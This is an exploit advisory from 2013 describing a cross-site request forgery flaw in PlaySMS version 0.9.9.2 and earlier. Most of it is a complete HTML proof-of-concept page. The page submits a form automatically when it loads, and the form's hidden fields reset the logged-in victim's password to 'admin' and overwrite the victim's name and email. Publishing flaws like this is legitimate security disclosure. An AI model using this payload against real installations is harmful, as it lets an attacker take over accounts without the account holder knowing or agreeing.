45 lines
No EOL
1.5 KiB
Text
45 lines
No EOL
1.5 KiB
Text
# Exploit Title : PlaySMS <= 0.9.9.2 CSRF
|
||
# Date : 2013/12/9
|
||
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
|
||
# Software Link : http://playsms.org/
|
||
# Author HomePage: http://security-geeks.blogspot.com/
|
||
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
|
||
|
||
# Cross-site request forgery
|
||
|
||
Playsms is an open source SMS managment system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
|
||
|
||
Playsms is not using any security token to prevent it against CSRF.You can manipulate any userdata.
|
||
PoC and Exploit to change user password:
|
||
|
||
<html>
|
||
<body onload="javascript:document.forms[0].submit()">
|
||
<form name="ex"action="http://localhost/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method=post enctype="multipart/form-data">
|
||
|
||
|
||
<input type=hidden size=30 maxlength=30 name=up_password value="admin">
|
||
|
||
<input type=hidden size=30 maxlength=30 name=up_password_conf value="admin">
|
||
|
||
<input type=hidden size=30 maxlength=100 name=up_name value="admin">
|
||
|
||
|
||
<input type=hidden size=30 maxlength=30 name=up_email value="admin@gmail.com">
|
||
|
||
|
||
|
||
<td><input type=hidden size=30 maxlength=250 name=up_address value=""></td>
|
||
|
||
<td><input type=hidden size=30 maxlength=100 name=up_city value=""></td>
|
||
|
||
<td><input type=hidden size=30 maxlength=100 name=up_state value=""></td>
|
||
|
||
|
||
<td><input type=hidden size=10 maxlength=10 name=up_zipcode value=""></td>
|
||
|
||
|
||
<input type=submit class=button value='Save'>
|
||
</form>
|
||
</html>
|
||
|
||
#Independent Pakistani Security Researcher |